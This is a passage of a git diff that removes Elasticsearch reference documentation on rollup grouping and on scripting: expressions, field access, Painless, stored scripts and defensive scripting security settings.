- -[discrete] -==== Timezones - -Rollup documents are stored in the timezone of the `date_histogram` group configuration in the job. If no timezone is specified, the default -is to rollup timestamps in `UTC`. - diff --git a/docs/reference/rollup/understanding-groups.asciidoc b/docs/reference/rollup/understanding-groups.asciidoc deleted file mode 100644 index face43cf966..00000000000 --- a/docs/reference/rollup/understanding-groups.asciidoc +++ /dev/null @@ -1,248 +0,0 @@ -[role="xpack"] -[testenv="basic"] -[[rollup-understanding-groups]] -=== Understanding groups - -experimental[] - -To preserve flexibility, Rollup Jobs are defined based on how future queries may need to use the data. Traditionally, systems force -the admin to make decisions about what metrics to rollup and on what interval. E.g. The average of `cpu_time` on an hourly basis. This -is limiting; if, in the future, the admin wishes to see the average of `cpu_time` on an hourly basis _and_ partitioned by `host_name`, -they are out of luck. - -Of course, the admin can decide to rollup the `[hour, host]` tuple on an hourly basis, but as the number of grouping keys grows, so do the -number of tuples the admin needs to configure. Furthermore, these `[hours, host]` tuples are only useful for hourly rollups... daily, weekly, -or monthly rollups all require new configurations. - -Rather than force the admin to decide ahead of time which individual tuples should be rolled up, Elasticsearch's Rollup jobs are configured -based on which groups are potentially useful to future queries. For example, this configuration: - -[source,js] --------------------------------------------------- -"groups" : { - "date_histogram": { - "field": "timestamp", - "fixed_interval": "1h", - "delay": "7d" - }, - "terms": { - "fields": ["hostname", "datacenter"] - }, - "histogram": { - "fields": ["load", "net_in", "net_out"], - "interval": 5 - } -} --------------------------------------------------- -// NOTCONSOLE - -Allows `date_histogram` to be used on the `"timestamp"` field, `terms` aggregations to be used on the `"hostname"` and `"datacenter"` -fields, and `histograms` to be used on any of `"load"`, `"net_in"`, `"net_out"` fields. - -Importantly, these aggs/fields can be used in any combination. This aggregation: - -[source,js] --------------------------------------------------- -"aggs" : { - "hourly": { - "date_histogram": { - "field": "timestamp", - "fixed_interval": "1h" - }, - "aggs": { - "host_names": { - "terms": { - "field": "hostname" - } - } - } - } -} --------------------------------------------------- -// NOTCONSOLE - -is just as valid as this aggregation: - -[source,js] --------------------------------------------------- -"aggs" : { - "hourly": { - "date_histogram": { - "field": "timestamp", - "fixed_interval": "1h" - }, - "aggs": { - "data_center": { - "terms": { - "field": "datacenter" - } - }, - "aggs": { - "host_names": { - "terms": { - "field": "hostname" - } - }, - "aggs": { - "load_values": { - "histogram": { - "field": "load", - "interval": 5 - } - } - } - } - } - } -} --------------------------------------------------- -// NOTCONSOLE - - -You'll notice that the second aggregation is not only substantially larger, it also swapped the position of the terms aggregation on -`"hostname"`, illustrating how the order of aggregations does not matter to rollups. Similarly, while the `date_histogram` is required -for rolling up data, it isn't required while querying (although often used). For example, this is a valid aggregation for -Rollup Search to execute: - - -[source,js] --------------------------------------------------- -"aggs" : { - "host_names": { - "terms": { - "field": "hostname" - } - } -} --------------------------------------------------- -// NOTCONSOLE - -Ultimately, when configuring `groups` for a job, think in terms of how you might wish to partition data in a query at a future date... -then include those in the config. Because Rollup Search allows any order or combination of the grouped fields, you just need to decide -if a field is useful for aggregating later, and how you might wish to use it (terms, histogram, etc). - -[[rollup-understanding-group-intervals]] -==== Calendar vs fixed time intervals - -Each rollup-job must have a date histogram group with a defined interval. {es} -understands both -<>. Fixed time -intervals are fairly easy to understand; `60s` means sixty seconds. But what -does `1M` mean? One month of time depends on which month we are talking about, -some months are longer or shorter than others. This is an example of calendar -time and the duration of that unit depends on context. Calendar units are also -affected by leap-seconds, leap-years, etc. - -This is important because the buckets generated by rollup are in either calendar -or fixed intervals and this limits how you can query them later. See -<>. - -We recommend sticking with fixed time intervals, since they are easier to -understand and are more flexible at query time. It will introduce some drift in -your data during leap-events and you will have to think about months in a fixed -quantity (30 days) instead of the actual calendar length. However, it is often -easier than dealing with calendar units at query time. - -Multiples of units are always "fixed". For example, `2h` is always the fixed -quantity `7200` seconds. Single units can be fixed or calendar depending on the -unit: - -[options="header"] -|======= -|Unit |Calendar |Fixed -|millisecond |NA |`1ms`, `10ms`, etc -|second |NA |`1s`, `10s`, etc -|minute |`1m` |`2m`, `10m`, etc -|hour |`1h` |`2h`, `10h`, etc -|day |`1d` |`2d`, `10d`, etc -|week |`1w` |NA -|month |`1M` |NA -|quarter |`1q` |NA -|year |`1y` |NA -|======= - -For some units where there are both fixed and calendar, you may need to express -the quantity in terms of the next smaller unit. For example, if you want a fixed -day (not a calendar day), you should specify `24h` instead of `1d`. Similarly, -if you want fixed hours, specify `60m` instead of `1h`. This is because the -single quantity entails calendar time, and limits you to querying by calendar -time in the future. - -==== Grouping limitations with heterogeneous indices - -There was previously a limitation in how Rollup could handle indices that had heterogeneous mappings (multiple, unrelated/non-overlapping -mappings). The recommendation at the time was to configure a separate job per data "type". For example, you might configure a separate -job for each Beats module that you had enabled (one for `process`, another for `filesystem`, etc). - -This recommendation was driven by internal implementation details that caused document counts to be potentially incorrect if a single "merged" -job was used. - -This limitation has since been alleviated. As of 6.4.0, it is now considered best practice to combine all rollup configurations -into a single job. - -As an example, if your index has two types of documents: - -[source,js] --------------------------------------------------- -{ - "timestamp": 1516729294000, - "temperature": 200, - "voltage": 5.2, - "node": "a" -} --------------------------------------------------- -// NOTCONSOLE - -and - -[source,js] --------------------------------------------------- -{ - "timestamp": 1516729294000, - "price": 123, - "title": "Foo" -} --------------------------------------------------- -// NOTCONSOLE - -the best practice is to combine them into a single rollup job which covers both of these document types, like this: - -[source,js] --------------------------------------------------- -PUT _rollup/job/combined -{ - "index_pattern": "data-*", - "rollup_index": "data_rollup", - "cron": "*/30 * * * * ?", - "page_size": 1000, - "groups": { - "date_histogram": { - "field": "timestamp", - "fixed_interval": "1h", - "delay": "7d" - }, - "terms": { - "fields": [ "node", "title" ] - } - }, - "metrics": [ - { - "field": "temperature", - "metrics": [ "min", "max", "sum" ] - }, - { - "field": "price", - "metrics": [ "avg" ] - } - ] -} --------------------------------------------------- -// NOTCONSOLE - -==== Doc counts and overlapping jobs - -There was previously an issue with document counts on "overlapping" job configurations, driven by the same internal implementation detail. -If there were two Rollup jobs saving to the same index, where one job is a "subset" of another job, it was possible that document counts -could be incorrect for certain aggregation arrangements. - -This issue has also since been eliminated in 6.4.0. diff --git a/docs/reference/scripting.asciidoc b/docs/reference/scripting.asciidoc deleted file mode 100644 index b081bd81c99..00000000000 --- a/docs/reference/scripting.asciidoc +++ /dev/null @@ -1,84 +0,0 @@ -[[modules-scripting]] -= Scripting - -[partintro] --- -With scripting, you can evaluate custom expressions in {es}. For example, you -could use a script to return "script fields" as part of a search request or -evaluate a custom score for a query. - -The default scripting language is <>. -Additional `lang` plugins enable you to run scripts written in other languages. -Everywhere a script can be used, you can include a `lang` parameter -to specify the language of the script. - -[discrete] -== General-purpose languages - -These languages can be used for any purpose in the scripting APIs, -and give the most flexibility. - -[cols="<,<,<",options="header",] -|======================================================================= -|Language - |Sandboxed - |Required plugin - -|<> - |yes - |built-in - -|======================================================================= - -[discrete] -== Special-purpose languages - -These languages are less flexible, but typically have higher performance for -certain tasks. - -[cols="<,<,<,<",options="header",] -|======================================================================= -|Language - |Sandboxed - |Required plugin - |Purpose - -|<> - |yes - |built-in - |fast custom ranking and sorting - -|<> - |yes - |built-in - |templates - -|<> - |n/a - |you write it! - |expert API - -|======================================================================= - -[WARNING] -.Scripts and security -================================================= - -Languages that are sandboxed are designed with security in mind. However, non- -sandboxed languages can be a security issue, please read -<> for more details. - -================================================= --- - -include::scripting/using.asciidoc[] - -include::scripting/fields.asciidoc[] - -include::scripting/security.asciidoc[] - -include::scripting/painless.asciidoc[] - -include::scripting/expression.asciidoc[] - -include::scripting/engine.asciidoc[] diff --git a/docs/reference/scripting/engine.asciidoc b/docs/reference/scripting/engine.asciidoc deleted file mode 100644 index 54d85e6e823..00000000000 --- a/docs/reference/scripting/engine.asciidoc +++ /dev/null @@ -1,56 +0,0 @@ -[[modules-scripting-engine]] -== Advanced scripts using script engines - -A `ScriptEngine` is a backend for implementing a scripting language. It may also -be used to write scripts that need to use advanced internals of scripting. For example, -a script that wants to use term frequencies while scoring. - -The plugin {plugins}/plugin-authors.html[documentation] has more information on -how to write a plugin so that Elasticsearch will properly load it. To register -the `ScriptEngine`, your plugin should implement the `ScriptPlugin` interface -and override the `getScriptEngine(Settings settings)` method. - -The following is an example of a custom `ScriptEngine` which uses the language -name `expert_scripts`. It implements a single script called `pure_df` which -may be used as a search script to override each document's score as -the document frequency of a provided term. - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{plugins-examples-dir}/script-expert-scoring/src/main/java/org/elasticsearch/example/expertscript/ExpertScriptPlugin.java[expert_engine] --------------------------------------------------- - -You can execute the script by specifying its `lang` as `expert_scripts`, and the name -of the script as the script source: - - -[source,console] --------------------------------------------------- -POST /_search -{ - "query": { - "function_score": { - "query": { - "match": { - "body": "foo" - } - }, - "functions": [ - { - "script_score": { - "script": { - "source": "pure_df", - "lang" : "expert_scripts", - "params": { - "field": "body", - "term": "foo" - } - } - } - } - ] - } - } -} --------------------------------------------------- -// TEST[skip:we don't have an expert script plugin installed to test this] diff --git a/docs/reference/scripting/expression.asciidoc b/docs/reference/scripting/expression.asciidoc deleted file mode 100644 index 61301fa873b..00000000000 --- a/docs/reference/scripting/expression.asciidoc +++ /dev/null @@ -1,141 +0,0 @@ -[[modules-scripting-expression]] -== Lucene expressions language - -Lucene's expressions compile a `javascript` expression to bytecode. They are -designed for high-performance custom ranking and sorting functions and are -enabled for `inline` and `stored` scripting by default. - -[discrete] -=== Performance - -Expressions were designed to have competitive performance with custom Lucene code. -This performance is due to having low per-document overhead as opposed to other -scripting engines: expressions do more "up-front". - -This allows for very fast execution, even faster than if you had written a `native` script. - -[discrete] -=== Syntax - -Expressions support a subset of javascript syntax: a single expression. - -See the https://lucene.apache.org/core/{lucene_version_path}/expressions/index.html?org/apache/lucene/expressions/js/package-summary.html[expressions module documentation] -for details on what operators and functions are available. - -Variables in `expression` scripts are available to access: - -* document fields, e.g. `doc['myfield'].value` -* variables and methods that the field supports, e.g. `doc['myfield'].empty` -* Parameters passed into the script, e.g. `mymodifier` -* The current document's score, `_score` (only available when used in a `script_score`) - -You can use Expressions scripts for `script_score`, `script_fields`, sort scripts, and numeric aggregation -scripts, simply set the `lang` parameter to `expression`. - -[discrete] -=== Numeric field API -[cols="<,<",options="header",] -|======================================================================= -|Expression |Description -|`doc['field_name'].value` |The value of the field, as a `double` - -|`doc['field_name'].empty` |A boolean indicating if the field has no -values within the doc. - -|`doc['field_name'].length` |The number of values in this document. - -|`doc['field_name'].min()` |The minimum value of the field in this document. - -|`doc['field_name'].max()` |The maximum value of the field in this document. - -|`doc['field_name'].median()` |The median value of the field in this document. - -|`doc['field_name'].avg()` |The average of the values in this document. - -|`doc['field_name'].sum()` |The sum of the values in this document. -|======================================================================= - -When a document is missing the field completely, by default the value will be treated as `0`. -You can treat it as another value instead, e.g. `doc['myfield'].empty ? 100 : doc['myfield'].value` - -When a document has multiple values for the field, by default the minimum value is returned. -You can choose a different value instead, e.g. `doc['myfield'].sum()`. - -When a document is missing the field completely, by default the value will be treated as `0`. - -Boolean fields are exposed as numerics, with `true` mapped to `1` and `false` mapped to `0`. -For example: `doc['on_sale'].value ? doc['price'].value * 0.5 : doc['price'].value` - -[discrete] -=== Date field API -Date fields are treated as the number of milliseconds since January 1, 1970 and -support the Numeric Fields API above, plus access to some date-specific fields: - -[cols="<,<",options="header",] -|======================================================================= -|Expression |Description -|`doc['field_name'].date.centuryOfEra`|Century (1-2920000) - -|`doc['field_name'].date.dayOfMonth`|Day (1-31), e.g. `1` for the first of the month. - -|`doc['field_name'].date.dayOfWeek`|Day of the week (1-7), e.g. `1` for Monday. - -|`doc['field_name'].date.dayOfYear`|Day of the year, e.g. `1` for January 1. - -|`doc['field_name'].date.era`|Era: `0` for BC, `1` for AD. - -|`doc['field_name'].date.hourOfDay`|Hour (0-23). - -|`doc['field_name'].date.millisOfDay`|Milliseconds within the day (0-86399999). - -|`doc['field_name'].date.millisOfSecond`|Milliseconds within the second (0-999). - -|`doc['field_name'].date.minuteOfDay`|Minute within the day (0-1439). - -|`doc['field_name'].date.minuteOfHour`|Minute within the hour (0-59). - -|`doc['field_name'].date.monthOfYear`|Month within the year (1-12), e.g. `1` for January. - -|`doc['field_name'].date.secondOfDay`|Second within the day (0-86399). - -|`doc['field_name'].date.secondOfMinute`|Second within the minute (0-59). - -|`doc['field_name'].date.year`|Year (-292000000 - 292000000). - -|`doc['field_name'].date.yearOfCentury`|Year within the century (1-100). - -|`doc['field_name'].date.yearOfEra`|Year within the era (1-292000000). -|======================================================================= - -The following example shows the difference in years between the `date` fields date0 and date1: - -`doc['date1'].date.year - doc['date0'].date.year` - -[discrete] -[[geo-point-field-api]] -=== `geo_point` field API -[cols="<,<",options="header",] -|======================================================================= -|Expression |Description -|`doc['field_name'].empty` |A boolean indicating if the field has no -values within the doc. - -|`doc['field_name'].lat` |The latitude of the geo point. - -|`doc['field_name'].lon` |The longitude of the geo point. -|======================================================================= - -The following example computes distance in kilometers from Washington, DC: - -`haversin(38.9072, 77.0369, doc['field_name'].lat, doc['field_name'].lon)` - -In this example the coordinates could have been passed as parameters to the script, -e.g. based on geolocation of the user. - -[discrete] -=== Limitations - -There are a few limitations relative to other script languages: - -* Only numeric, boolean, date, and geo_point fields may be accessed -* Stored fields are not available diff --git a/docs/reference/scripting/fields.asciidoc b/docs/reference/scripting/fields.asciidoc deleted file mode 100644 index e83b54c9328..00000000000 --- a/docs/reference/scripting/fields.asciidoc +++ /dev/null @@ -1,261 +0,0 @@ -[[modules-scripting-fields]] -== Accessing document fields and special variables - -Depending on where a script is used, it will have access to certain special -variables and document fields. - -[discrete] -== Update scripts - -A script used in the <>, -<>, or <> -API will have access to the `ctx` variable which exposes: - -[horizontal] -`ctx._source`:: Access to the document <>. -`ctx.op`:: The operation that should be applied to the document: `index` or `delete`. -`ctx._index` etc:: Access to <>, some of which may be read-only. - -[discrete] -== Search and aggregation scripts - -With the exception of <> which are -executed once per search hit, scripts used in search and aggregations will be -executed once for every document which might match a query or an aggregation. -Depending on how many documents you have, this could mean millions or billions -of executions: these scripts need to be fast! - -Field values can be accessed from a script using -<>, -<>, or -<>, -each of which is explained below. - -[[scripting-score]] -[discrete] -=== Accessing the score of a document within a script - -Scripts used in the <>, -in <>, or in -<> have access to the `_score` variable which -represents the current relevance score of a document. - -Here's an example of using a script in a -<> to alter the -relevance `_score` of each document: - -[source,console] -------------------------------------- -PUT my-index-000001/_doc/1?refresh -{ - "text": "quick brown fox", - "popularity": 1 -} - -PUT my-index-000001/_doc/2?refresh -{ - "text": "quick fox", - "popularity": 5 -} - -GET my-index-000001/_search -{ - "query": { - "function_score": { - "query": { - "match": { - "text": "quick brown fox" - } - }, - "script_score": { - "script": { - "lang": "expression", - "source": "_score * doc['popularity']" - } - } - } - } -} -------------------------------------- - - -[discrete] -[[modules-scripting-doc-vals]] -=== Doc values - -By far the fastest most efficient way to access a field value from a -script is to use the `doc['field_name']` syntax, which retrieves the field -value from <>. Doc values are a columnar field value -store, enabled by default on all fields except for <>. - -[source,console] -------------------------------- -PUT my-index-000001/_doc/1?refresh -{ - "cost_price": 100 -} - -GET my-index-000001/_search -{ - "script_fields": { - "sales_price": { - "script": { - "lang": "expression", - "source": "doc['cost_price'] * markup", - "params": { - "markup": 0.2 - } - } - } - } -} -------------------------------- - -Doc-values can only return "simple" field values like numbers, dates, geo- -points, terms, etc, or arrays of these values if the field is multi-valued. -It cannot return JSON objects. - -[NOTE] -.Missing fields -=================================================== - -The `doc['field']` will throw an error if `field` is missing from the mappings. -In `painless`, a check can first be done with `doc.containsKey('field')` to guard -accessing the `doc` map. Unfortunately, there is no way to check for the -existence of the field in mappings in an `expression` script. - -=================================================== - -[NOTE] -.Doc values and `text` fields -=================================================== - -The `doc['field']` syntax can also be used for <> -if <> is enabled, but *BEWARE*: enabling fielddata on a -`text` field requires loading all of the terms into the JVM heap, which can be -very expensive both in terms of memory and CPU. It seldom makes sense to -access `text` fields from scripts. - -=================================================== - -[discrete] -[[modules-scripting-source]] -=== The document `_source` - -The document <> can be accessed using the -`_source.field_name` syntax. The `_source` is loaded as a map-of-maps, so -properties within object fields can be accessed as, for example, -`_source.name.first`. - -[IMPORTANT] -.Prefer doc-values to _source -========================================================= - -Accessing the `_source` field is much slower than using doc-values. The -_source field is optimised for returning several fields per result, while doc -values are optimised for accessing the value of a specific field in many -documents. - -It makes sense to use `_source` when generating a -<> for the top ten hits from a -search result but, for other search and aggregation use cases, always prefer -using doc values. -========================================================= - - -For instance: - -[source,console] -------------------------------- -PUT my-index-000001 -{ - "mappings": { - "properties": { - "first_name": { - "type": "text" - }, - "last_name": { - "type": "text" - } - } - } -} - -PUT my-index-000001/_doc/1?refresh -{ - "first_name": "Barry", - "last_name": "White" -} - -GET my-index-000001/_search -{ - "script_fields": { - "full_name": { - "script": { - "lang": "painless", - "source": "params._source.first_name + ' ' + params._source.last_name" - } - } - } -} -------------------------------- - -[discrete] -[[modules-scripting-stored]] -=== Stored fields - -_Stored fields_ -- fields explicitly marked as -<> in the mapping -- can be accessed using the -`_fields['field_name'].value` or `_fields['field_name']` syntax: - -[source,console] -------------------------------- -PUT my-index-000001 -{ - "mappings": { - "properties": { - "full_name": { - "type": "text", - "store": true - }, - "title": { - "type": "text", - "store": true - } - } - } -} - -PUT my-index-000001/_doc/1?refresh -{ - "full_name": "Alice Ball", - "title": "Professor" -} - -GET my-index-000001/_search -{ - "script_fields": { - "name_with_title": { - "script": { - "lang": "painless", - "source": "params._fields['title'].value + ' ' + params._fields['full_name'].value" - } - } - } -} -------------------------------- - -[TIP] -.Stored vs `_source` -======================================================= - -The `_source` field is just a special stored field, so the performance is -similar to that of other stored fields. The `_source` provides access to the -original document body that was indexed (including the ability to distinguish -`null` values from empty fields, single-value arrays from plain scalars, etc). - -The only time it really makes sense to use stored fields instead of the -`_source` field is when the `_source` is very large and it is less costly to -access a few small stored fields instead of the entire `_source`. - -======================================================= diff --git a/docs/reference/scripting/painless.asciidoc b/docs/reference/scripting/painless.asciidoc deleted file mode 100644 index 82d886589d2..00000000000 --- a/docs/reference/scripting/painless.asciidoc +++ /dev/null @@ -1,32 +0,0 @@ -[[modules-scripting-painless]] -== Painless scripting language - -_Painless_ is a simple, secure scripting language designed specifically for use -with Elasticsearch. It is the default scripting language for Elasticsearch and -can safely be used for inline and stored scripts. To get started with -Painless, see the {painless}/painless-guide.html[Painless Guide]. For a -detailed description of the Painless syntax and language features, see the -{painless}/painless-lang-spec.html[Painless Language Specification]. - -[[painless-features]] -You can use Painless anywhere scripts can be used in Elasticsearch. Painless -provides: - -* Fast performance: Painless scripts https://benchmarks.elastic.co/index.html#search_qps_scripts[ -run several times faster] than the alternatives. - -* Safety: Fine-grained allowlists with method call/field granularity. See the -{painless}/painless-api-reference.html[Painless API Reference] for a -complete list of available classes and methods. - -* Optional typing: Variables and parameters can use explicit types or the -dynamic `def` type. - -* Syntax: Extends a subset of Java's syntax to provide additional scripting -language features. - -* Optimizations: Designed specifically for Elasticsearch scripting. - -Ready to start scripting with Painless? See the -{painless}/painless-guide.html[Painless Guide] for the -{painless}/index.html[Painless Scripting Language]. \ No newline at end of file diff --git a/docs/reference/scripting/security.asciidoc b/docs/reference/scripting/security.asciidoc deleted file mode 100644 index 505c4db3f3f..00000000000 --- a/docs/reference/scripting/security.asciidoc +++ /dev/null @@ -1,114 +0,0 @@ -[[modules-scripting-security]] -== Scripting and security - -While Elasticsearch contributors make every effort to prevent scripts from -running amok, security is something best done in -{wikipedia}/Defense_in_depth_(computing)[layers] because -all software has bugs and it is important to minimize the risk of failure in -any security layer. Find below rules of thumb for how to keep Elasticsearch -from being a vulnerability. - -[discrete] -=== Do not run as root -First and foremost, never run Elasticsearch as the `root` user as this would -allow any successful effort to circumvent the other security layers to do -*anything* on your server. Elasticsearch will refuse to start if it detects -that it is running as `root` but this is so important that it is worth double -and triple checking. - -[discrete] -=== Do not expose Elasticsearch directly to users -Do not expose Elasticsearch directly to users, instead have an application -make requests on behalf of users. If this is not possible, have an application -to sanitize requests from users. If *that* is not possible then have some -mechanism to track which users did what. Understand that it is quite possible -to write a <> that overwhelms Elasticsearch and brings down -the cluster. All such searches should be considered bugs and the Elasticsearch -contributors make an effort to prevent this but they are still possible. - -[discrete] -=== Do not expose Elasticsearch directly to the Internet -Do not expose Elasticsearch to the Internet, instead have an application -make requests on behalf of the Internet. Do not entertain the thought of having -an application "sanitize" requests to Elasticsearch. Understand that it is -possible for a sufficiently determined malicious user to write searches that -overwhelm the Elasticsearch cluster and bring it down. For example: - -Good: - -* Users type text into a search box and the text is sent directly to a -<>, <>, -<>, or any of the <>. -* Running a script with any of the above queries that was written as part of -the application development process. -* Running a script with `params` provided by users. -* User actions makes documents with a fixed structure. - -Bad: - -* Users can write arbitrary scripts, queries, `_search` requests. -* User actions make documents with structure defined by users. - -[discrete] -[[modules-scripting-other-layers]] -=== Other security layers -In addition to user privileges and script sandboxing Elasticsearch uses the -https://www.oracle.com/java/technologies/javase/seccodeguide.html[Java Security Manager] -and native security tools as additional layers of security. - -As part of its startup sequence Elasticsearch enables the Java Security Manager -which limits the actions that can be taken by portions of the code. Painless -uses this to limit the actions that generated Painless scripts can take, -preventing them from being able to do things like write files and listen to -sockets. - -Elasticsearch uses -{wikipedia}/Seccomp[seccomp] in Linux, -https://www.chromium.org/developers/design-documents/sandbox/osx-sandboxing-design[Seatbelt] -in macOS, and -https://msdn.microsoft.com/en-us/library/windows/desktop/ms684147[ActiveProcessLimit] -on Windows to prevent Elasticsearch from forking or executing other processes. - -Below this we describe the security settings for scripts and how you can -change from the defaults described above. You should be very, very careful -when allowing more than the defaults. Any extra permissions weakens the total -security of the Elasticsearch deployment. - -[[allowed-script-types-setting]] -[discrete] -=== Allowed script types setting - -Elasticsearch supports two script types: `inline` and `stored` (<>). -By default, {es} is configured to run both types of scripts. -To limit what type of scripts are run, set `script.allowed_types` to `inline` or `stored`. -To prevent any scripts from running, set `script.allowed_types` to `none`. - -IMPORTANT: If you use {kib}, set `script.allowed_types` to `both` or `inline`. -Some {kib} features rely on inline scripts and do not function as expected -if {es} does not allow inline scripts. - -For example, to run `inline` scripts but not `stored` scripts, specify: - -[source,yaml] ----- -script.allowed_types: inline <1> ----- -<1> This will allow only inline scripts to be executed but not stored scripts -(or any other types). - - -[[allowed-script-contexts-setting]] -[discrete] -=== Allowed script contexts setting - -By default all script contexts are allowed to be executed. This can be modified using the -setting `script.allowed_contexts`. Only the contexts specified as part of the setting will -be allowed to be executed. To specify no contexts are allowed, set `script.allowed_contexts` -to be `none`. - -[source,yaml] ----- -script.allowed_contexts: score, update <1> ----- -<1> This will allow only scoring and update scripts to be executed but not -aggs or plugin scripts (or any other contexts). diff --git a/docs/reference/scripting/using.asciidoc b/docs/reference/scripting/using.asciidoc deleted file mode 100644 index f81b7b9a642..00000000000 --- a/docs/reference/scripting/using.asciidoc +++ /dev/null @@ -1,432 +0,0 @@ -[[modules-scripting-using]] -== How to use scripts - -Wherever scripting is supported in the Elasticsearch API, the syntax follows -the same pattern: - -[source,js] -------------------------------------- - "script": { - "lang": "...", <1> - "source" | "id": "...", <2> - "params": { ... } <3> - } -------------------------------------- -// NOTCONSOLE -<1> The language the script is written in, which defaults to `painless`. -<2> The script itself which may be specified as `source` for an inline script or `id` for a stored script. -<3> Any named parameters that should be passed into the script. - -For example, the following script is used in a search request to return a -<>: - -[source,console] -------------------------------------- -PUT my-index-000001/_doc/1 -{ - "my_field": 5 -} - -GET my-index-000001/_search -{ - "script_fields": { - "my_doubled_field": { - "script": { - "lang": "expression", - "source": "doc['my_field'] * multiplier", - "params": { - "multiplier": 2 - } - } - } - } -} -------------------------------------- - -[discrete] -=== Script parameters - -`lang`:: - - Specifies the language the script is written in. Defaults to `painless`. - - -`source`, `id`:: - - Specifies the source of the script. An `inline` script is specified - `source` as in the example above. A `stored` script is specified `id` - and is retrieved from the cluster state (see <>). - - -`params`:: - - Specifies any named parameters that are passed into the script as - variables. - -[IMPORTANT] -[[prefer-params]] -.Prefer parameters -======================================== - -The first time Elasticsearch sees a new script, it compiles it and stores the -compiled version in a cache. Compilation can be a heavy process. - -If you need to pass variables into the script, you should pass them in as -named `params` instead of hard-coding values into the script itself. For -example, if you want to be able to multiply a field value by different -multipliers, don't hard-code the multiplier into the script: - -[source,js] ----------------------- - "source": "doc['my_field'] * 2" ----------------------- -// NOTCONSOLE - -Instead, pass it in as a named parameter: - -[source,js] ----------------------- - "source": "doc['my_field'] * multiplier", - "params": { - "multiplier": 2 - } ----------------------- -// NOTCONSOLE - -The first version has to be recompiled every time the multiplier changes. The -second version is only compiled once. - -If you compile too many unique scripts within a small amount of time, -Elasticsearch will reject the new dynamic scripts with a -`circuit_breaking_exception` error. For most contexts, you can compile up to 75 -scripts per 5 minutes by default. For ingest contexts, the default script -compilation rate is unlimited. You can change these settings dynamically by -setting `script.context.$CONTEXT.max_compilations_rate` eg. -`script.context.field.max_compilations_rate=100/10m`. - -======================================== - -[discrete] -[[modules-scripting-short-script-form]] -=== Short script form -A short script form can be used for brevity. In the short form, `script` is represented -by a string instead of an object. This string contains the source of the script. - -Short form: - -[source,js] ----------------------- - "script": "ctx._source.my-int++" ----------------------- -// NOTCONSOLE - -The same script in the normal form: - -[source,js] ----------------------- - "script": { - "source": "ctx._source.my-int++" - } ----------------------- -// NOTCONSOLE - -[discrete] -[[modules-scripting-stored-scripts]] -=== Stored scripts - -Scripts may be stored in and retrieved from the cluster state using the -`_scripts` end-point. - -If the {es} {security-features} are enabled, you must have the following -privileges to create, retrieve, and delete stored scripts: - -* cluster: `all` or `manage` - -For more information, see <>. - - -[discrete] -==== Request examples - -The following are examples of using a stored script that lives at -`/_scripts/{id}`. - -First, create the script called `calculate-score` in the cluster state: - -[source,console] ------------------------------------ -POST _scripts/calculate-score -{ - "script": { - "lang": "painless", - "source": "Math.log(_score * 2) + params.my_modifier" - } -} ------------------------------------ -// TEST[setup:my_index] - -You may also specify a context as part of the url path to compile a -stored script against that specific context in the form of -`/_scripts/{id}/{context}`: - -[source,console] ------------------------------------ -POST _scripts/calculate-score/score -{ - "script": { - "lang": "painless", - "source": "Math.log(_score * 2) + params.my_modifier" - } -} ------------------------------------ -// TEST[setup:my_index] - -This same script can be retrieved with: - -[source,console] ------------------------------------ -GET _scripts/calculate-score ------------------------------------ -// TEST[continued] - -Stored scripts can be used by specifying the `id` parameters as follows: - -[source,console] --------------------------------------------------- -GET my-index-000001/_search -{ - "query": { - "script_score": { - "query": { - "match": { - "message": "some message" - } - }, - "script": { - "id": "calculate-score", - "params": { - "my_modifier": 2 - } - } - } - } -} --------------------------------------------------- -// TEST[continued] - -And deleted with: - -[source,console] ------------------------------------ -DELETE _scripts/calculate-score ------------------------------------ -// TEST[continued] - -[discrete] -[[modules-scripting-search-templates]] -=== Search templates -You can also use the `_scripts` API to store **search templates**. Search -templates save specific <> with placeholder -values, called template parameters. - -You can use stored search templates to run searches without writing out the -entire query. Just provide the stored template's ID and the template parameters. -This is useful when you want to run a commonly used query quickly and without -mistakes. - -Search templates use the https://mustache.github.io/mustache.5.html[mustache -templating language]. See <> for more information and examples. - -[discrete] -[[modules-scripting-using-caching]] -=== Script caching - -All scripts are cached by default so that they only need to be recompiled -when updates occur. By default, scripts do not have a time-based expiration, but -you can configure the size of this cache using the -`script.context.$CONTEXT.cache_expire` setting. -By default, the cache size is `100` for all contexts except the `ingest` and the -`processor_conditional` context, where it is `200`. - -|==== -| Context | Default Cache Size -| `ingest` | 200 -| `processor_conditional` | 200 -| default | 100 -|==== - -NOTE: The size of scripts is limited to 65,535 bytes. This can be -changed by setting `script.max_size_in_bytes` setting to increase that soft -limit, but if scripts are really large then a -<> should be considered. - -[[scripts-and-search-speed]] -=== Scripts and search speed - -Scripts can't make use of {es}'s index structures or related optimizations. This -can sometimes result in slower search speeds. - -If you often use scripts to transform indexed data, you can speed up search by -making these changes during ingest instead. However, that often means slower -index speeds. - -.*Example* -[%collapsible] -===== -An index, `my_test_scores`, contains two `long` fields: - -* `math_score` -* `verbal_score` - -When running searches, users often use a script to sort results by the sum of -these two field's values. - -[source,console] ----- -GET /my_test_scores/_search -{ - "query": { - "term": { - "grad_year": "2099" - } - }, - "sort": [ - { - "_script": { - "type": "number", - "script": { - "source": "doc['math_score'].value + doc['verbal_score'].value" - }, - "order": "desc" - } - } - ] -} ----- -// TEST[s/^/PUT my_test_scores\n/] - -To speed up search, you can perform this calculation during ingest and index the -sum to a field instead. - -First, <>, `total_score`, to the index. The -`total_score` field will contain sum of the `math_score` and `verbal_score` -field values. - -[source,console] ----- -PUT /my_test_scores/_mapping -{ - "properties": { - "total_score": { - "type": "long" - } - } -} ----- -// TEST[continued] - -Next, use an <> containing the -<> processor to calculate the sum of `math_score` and -`verbal_score` and index it in the `total_score` field. - -[source,console] ----- -PUT _ingest/pipeline/my_test_scores_pipeline -{ - "description": "Calculates the total test score", - "processors": [ - { - "script": { - "source": "ctx.total_score = (ctx.math_score + ctx.verbal_score)" - } - } - ] -} ----- -// TEST[continued] - -To update existing data, use this pipeline to <> any -documents from `my_test_scores` to a new index, `my_test_scores_2`. - -[source,console] ----- -POST /_reindex -{ - "source": { - "index": "my_test_scores" - }, - "dest": { - "index": "my_test_scores_2", - "pipeline": "my_test_scores_pipeline" - } -} ----- -// TEST[continued] - -Continue using the pipeline to index any new documents to `my_test_scores_2`. - -[source,console] ----- -POST /my_test_scores_2/_doc/?pipeline=my_test_scores_pipeline -{ - "student": "kimchy", - "grad_year": "2099", - "math_score": 800, - "verbal_score": 800 -} ----- -// TEST[continued] - -These changes may slow indexing but allow for faster searches. Users can now -sort searches made on `my_test_scores_2` using the 